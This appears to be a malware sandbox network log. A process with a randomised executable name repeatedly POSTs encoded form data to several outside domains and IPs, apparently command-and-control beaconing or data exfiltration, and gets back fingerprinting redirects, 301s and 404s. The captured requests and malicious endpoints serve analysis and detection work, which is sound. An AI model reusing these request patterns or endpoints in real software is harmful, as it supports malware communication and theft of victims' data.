                                                                                  Server: nginx/1.26.2
                                                                                  Set-Cookie: cfid=e16447c0-4acc-4667-bfa9-7d2affaace7c;Path=/;Expires=Thu, 12-Nov-2054 22:27:56 UTC;HttpOnly
                                                                                  Set-Cookie: cftoken=0;Path=/;Expires=Thu, 12-Nov-2054 22:27:56 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_LV=1731508586200;Path=/;Expires=Tue, 11-Feb-2025 14:36:26 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_TC=1731508586200;Path=/;Expires=Tue, 11-Feb-2025 14:36:26 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_HC=2;Path=/;Expires=Tue, 11-Feb-2025 14:36:26 UTC;HttpOnly
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>129 Glenforest Rd.</title><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="stylesheet"


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  37 | 192.168.2.5 | 50019 | 103.224.182.242 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:36:40.162446022 CET | 694 | OUT | POST /p31e/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.madhf.tech
                                                                                  Origin: http://www.madhf.tech
                                                                                  Referer: http://www.madhf.tech/p31e/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=G8d6805Tf+acLmErUsWc4qlbKvI9lbJvxaITIztEBMYy4k3abkI1zFAx6xNf+ibhlOfhl656X5OZF/j/+AokdfhM6wxXRmx5MNYtIsM3M1e20ZYKmLmFQFd0CTQp41pC2CfUnZVFU6Ygf0JmFfXlaFN8hY7S9sfgpB8q85u/U7AodtXR3StVLnrLxxVkPE78/7M7zy4=
                                                                                  Nov 13, 2024 15:36:40.879652023 CET | 871 | IN | HTTP/1.1 200 OK
                                                                                  date: Wed, 13 Nov 2024 14:36:40 GMT
                                                                                  server: Apache
                                                                                  set-cookie: __tad=1731508600.3861162; expires=Sat, 11-Nov-2034 14:36:40 GMT; Max-Age=315360000
                                                                                  vary: Accept-Encoding
                                                                                  content-encoding: gzip
                                                                                  content-length: 576
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  connection: close


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  38 | 192.168.2.5 | 50020 | 103.224.182.242 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:36:42.715481043 CET | 714 | OUT | POST /p31e/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.madhf.tech
                                                                                  Origin: http://www.madhf.tech
                                                                                  Referer: http://www.madhf.tech/p31e/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=G8d6805Tf+acJGUrXNWc+KlYPvI9wLJ0xaMTIxABB5oy4FHaJ1I1wFAx1RNa9SatlOiLl7F6X5aZF6H//zAjdPhO1QxVO2x5MNYtIsYRM1W20poKgamCYld1DTQpvlp42Cf6nbgQU/cgf15mFOXmVFN+lY7HzJ+TuyRj+qu+KIYOV7m7twl9YHHzhidTe0aVlYcLtlufjXTe7OcoRbfEhUwRlyVD
                                                                                  Nov 13, 2024 15:36:43.384516954 CET | 871 | IN | HTTP/1.1 200 OK
                                                                                  date: Wed, 13 Nov 2024 14:36:43 GMT
                                                                                  server: Apache
                                                                                  set-cookie: __tad=1731508603.5858274; expires=Sat, 11-Nov-2034 14:36:43 GMT; Max-Age=315360000
                                                                                  vary: Accept-Encoding
                                                                                  content-encoding: gzip
                                                                                  content-length: 576
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  connection: close


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  39 | 192.168.2.5 | 50021 | 103.224.182.242 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:36:46.119581938 CET | 1731 | OUT | POST /p31e/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.madhf.tech
                                                                                  Origin: http://www.madhf.tech
                                                                                  Referer: http://www.madhf.tech/p31e/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:36:46.796236038 CET | 871 | IN | HTTP/1.1 200 OK
                                                                                  date: Wed, 13 Nov 2024 14:36:46 GMT
                                                                                  server: Apache
                                                                                  set-cookie: __tad=1731508606.5697575; expires=Sat, 11-Nov-2034 14:36:46 GMT; Max-Age=315360000
                                                                                  vary: Accept-Encoding
                                                                                  content-encoding: gzip
                                                                                  content-length: 576
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  connection: close


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  40 | 192.168.2.5 | 50022 | 103.224.182.242 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:36:48.659477949 CET | 439 | OUT | GET /p31e/?2J=L+1a/BdGYszeAGcVS8K8+8pLLusK97ER9aBhPiMrG4kn6GD5PjBb9DoL0CFI31uDvMTM4NZQBreJcdqa1xIiIspx5ApjHldDKvBxAP0DMlqCnZV88rmUcHIUAjJk93smhg==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.madhf.tech
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:36:49.327467918 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                  date: Wed, 13 Nov 2024 14:36:49 GMT
                                                                                  server: Apache
                                                                                  set-cookie: __tad=1731508609.6537356; expires=Sat, 11-Nov-2034 14:36:49 GMT; Max-Age=315360000
                                                                                  vary: Accept-Encoding
                                                                                  content-length: 1502
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  connection: close
                                                                                  Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/p31e/?2J=L+1a/BdGYszeAGcVS8K8+8pLLusK97ER9aBhPiMrG4kn6GD5PjBb9DoL0CFI31uDvMTM4NZQBreJcdqa1xIiIspx5ApjHldDKvBxAP0DMlqCnZV88rmUcHIUAjJk93smhg==&tXul=U2UloNhP&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#fff
                                                                                  Nov 13, 2024 15:36:49.327493906 CET | 538 | IN
                                                                                  Data Ascii: fff" text="#000000"><div style='display: none;'><a href='http://www.madhf.tech/p31e/?2J=L+1a/BdGYszeAGcVS8K8+8pLLusK97ER9aBhPiMrG4kn6GD5PjBb9DoL0CFI31uDvMTM4NZQBreJcdqa1xIiIspx5ApjHldDKvBxAP0DMlqCnZV88rmUcHIUAjJk93smhg==&tXul=U2UloNhP&fp=-3'>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  41 | 192.168.2.5 | 50023 | 76.223.74.74 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:36:54.477118969 CET | 718 | OUT | POST /cu92/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.grandesofertas.fun
                                                                                  Origin: http://www.grandesofertas.fun
                                                                                  Referer: http://www.grandesofertas.fun/cu92/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=ouvQSRAtTWEpsHlU8iqY2HDxzfaDMGXIqnKMgQaKFSB6RkUcmvhWy5cP1hCGpDgJHz9cVe2pV4mj1y+Dzs8AB+6M0lvTvyTuJDJ8wtUKup8SnmlDsg+6TE1AKywqqWSFPJLHi6eXihYj2Ki9RTl0Xm4TN9K3iWGY1qRxLJnGIWPG1IPMF2feqyo5CUSKE3SfuNiMaR0=
                                                                                  Nov 13, 2024 15:36:55.119054079 CET | 456 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:36:55 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 162
                                                                                  Connection: close
                                                                                  Location: https://www.grandesofertas.fun/cu92/
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  42 | 192.168.2.5 | 50024 | 76.223.74.74 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:36:57.022141933 CET | 738 | OUT | POST /cu92/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.grandesofertas.fun
                                                                                  Origin: http://www.grandesofertas.fun
                                                                                  Referer: http://www.grandesofertas.fun/cu92/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=ouvQSRAtTWEptn1UwhCY63Dw9/aDVWXEqnGMgRfPFnZ6RB4cnuhW+ZcP+BCHmjgCHzAjVbOpV8Oj126DzfUDHu6Kh1vRyiTuJDJ8wtwsupESmXVD+VS1ek1fLywquWTMPJLli7Sxincj2LS9RBN7dm4ZQtL+q0zQxsJcHa6YQn7w5e+mfUX25SEBSHa9VHz20uy8EGiHwM8UEQPKTcCGbQxlBfct
                                                                                  Nov 13, 2024 15:36:57.661840916 CET | 456 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:36:57 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 162
                                                                                  Connection: close
                                                                                  Location: https://www.grandesofertas.fun/cu92/
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  43 | 192.168.2.5 | 50025 | 76.223.74.74 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:36:59.629200935 CET | 1755 | OUT | POST /cu92/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.grandesofertas.fun
                                                                                  Origin: http://www.grandesofertas.fun
                                                                                  Referer: http://www.grandesofertas.fun/cu92/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:37:00.259753942 CET | 456 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:37:00 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 162
                                                                                  Connection: close
                                                                                  Location: https://www.grandesofertas.fun/cu92/
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  44 | 192.168.2.5 | 50026 | 76.223.74.74 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:37:02.174792051 CET | 447 | OUT | GET /cu92/?2J=lsHwRlN9eHt1sCRZ6R6my3qo0uOsMlznhj79tynlIjZaDxATi7cI0dkl3mGbhDcZOCNwErTQXryorxHC4PkDe5WJpFvO4SjuRTQ+4P0+jcQZ5F9wjze3RXp2BxR3tkOJaw==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.grandesofertas.fun
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:37:02.845258951 CET | 606 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:37:02 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 162
                                                                                  Connection: close
                                                                                  Location: https://www.grandesofertas.fun/cu92/?2J=lsHwRlN9eHt1sCRZ6R6my3qo0uOsMlznhj79tynlIjZaDxATi7cI0dkl3mGbhDcZOCNwErTQXryorxHC4PkDe5WJpFvO4SjuRTQ+4P0+jcQZ5F9wjze3RXp2BxR3tkOJaw==&tXul=U2UloNhP
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  45 | 192.168.2.5 | 50027 | 163.44.185.183 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:37:08.955539942 CET | 721 | OUT | POST /p9qy/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.sankan-fukushi.info
                                                                                  Origin: http://www.sankan-fukushi.info
                                                                                  Referer: http://www.sankan-fukushi.info/p9qy/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=hxmHzr8+Kek9C4U2WcnUvZw/4HGkXa8rDNXYCEwJeIiCvqwTFe//tjlzWiP5fF1AF3YEC8fE976PxDspydDb4wF7NDlO1FdRHAjbEGqcEyJ56PhIa6xKmPdEWQiJgGNk3nQR7ZgwXtiCOAbG8z7AHQh4kt2t7ckicehk/65ef0jvX+OMckEdJMaZDln+B0lhi3glrZI=
                                                                                  Nov 13, 2024 15:37:09.841588974 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:37:09 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 19268
                                                                                  Connection: close
                                                                                  Server: Apache
                                                                                  Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  46 | 192.168.2.5 | 50028 | 163.44.185.183 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:37:11.509933949 CET | 741 | OUT | POST /p9qy/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.sankan-fukushi.info
                                                                                  Origin: http://www.sankan-fukushi.info
                                                                                  Referer: http://www.sankan-fukushi.info/p9qy/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=hxmHzr8+Kek9BZk2U77U+pw+m3GkZK8vDNbYCAAZCqWCvPUTEaj/qjlzOSP4bF1bF3E2C9zE97uPxCcpzuqp5gF1EjlI6ldRHAjbEGXBEx55585IcrxJvvdLRQiJ22Ng3nRE7Y8aXuaCOCDG8i7HJQh2pN3F7fFeWuJZy7g2MFGVfo/mGGM1as2hT2vJQEEI4UwV1Oec+ITCBqzcPxLraiJ8AcTr
                                                                                  Nov 13, 2024 15:37:12.388792992 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:37:12 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 19268
                                                                                  Connection: close
                                                                                  Server: Apache
                                                                                  Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                  Accept-Ranges: bytes


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  47 | 192.168.2.5 | 50029 | 163.44.185.183 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:37:14.055740118 CET | 1758 | OUT | POST /p9qy/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.sankan-fukushi.info
                                                                                  Origin: http://www.sankan-fukushi.info
                                                                                  Referer: http://www.sankan-fukushi.info/p9qy/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J= [TRUNCATED]
                                                                                  Nov 13, 2024 15:37:14.922352076 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:37:14 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 19268
                                                                                  Connection: close
                                                                                  Server: Apache
                                                                                  Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                  Accept-Ranges: bytes


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  48 | 192.168.2.5 | 50030 | 163.44.185.183 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:37:16.723383904 CET | 448 | OUT | GET /p9qy/?2J=szOnwbI0B7M9cMMwX4bDwuNgoUWUV7slIpLLNm8Tfpa5tKMeNeGfvlEASyf1bFN7LlEkU7ntq56NwT9FzvKbuwV8GB1U7lwGbSSnMTrnLCsmtu5+GLJZif51cB3zkwMvhA==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.sankan-fukushi.info
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:37:17.605088949 CET | 192 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:37:17 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 19268
                                                                                  Connection: close
                                                                                  Server: Apache
                                                                                  Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                  Data Ascii: -13.8 24.242-30.191.013-4.387-.836-8.734-2.5-12.793-12.225.407-26.935-2.694-34.342-10.43z"/><path fill="#f60" d="M39.256 44.625c-1.8 0-3.2 1.776-3.217 4.064-.017 2.288 1.392 4.079 3.172 4.094 1.78.015 3.2-1.776 3.217-4.064.017-2.288-1.376-4.07


Session ID:49
Source IP:192.168.2.5
Source Port:50031
Destination IP:188.114.96.3
Destination Port:80
PID:3160
Process:C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
Timestamp:Nov 13, 2024 15:37:22.965634108 CET
Bytes transferred:718
Direction:OUT
Data:
POST /7arg/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.rtpwslot888gol.sbs
                                                                                  Origin: http://www.rtpwslot888gol.sbs
                                                                                  Referer: http://www.rtpwslot888gol.sbs/7arg/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
Timestamp:Nov 13, 2024 15:37:24.060480118 CET
Bytes transferred:1236
Direction:IN
Data:
HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:37:23 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3tA0dKiHcngbjM4J%2FoOvKisUDigbobik1ANvMdR6N%2F0%2BGUqbO%2FQIXDXTZTLf1QhZkrUO9i%2FCAYOZk1VMfIL%2F%2B0QbntCQ%2FAd%2FOh71geHsj8EV08i22Cawp5Kfwc7EXzNJU0dmq1Yo5%2FpM"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e1f7fe04ff02c9c-DFW
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1111&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=718&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID:50
Source IP:192.168.2.5
Source Port:50032
Destination IP:188.114.96.3
Destination Port:80
PID:3160
Process:C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
Timestamp:Nov 13, 2024 15:37:25.513273954 CET
Bytes transferred:738
Direction:OUT
Data:
POST /7arg/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.rtpwslot888gol.sbs
                                                                                  Origin: http://www.rtpwslot888gol.sbs
                                                                                  Referer: http://www.rtpwslot888gol.sbs/7arg/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
Timestamp:Nov 13, 2024 15:37:26.214452982 CET
Bytes transferred:1236
Direction:IN
Data:
HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:37:26 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  cf-cache-status: DYNAMIC
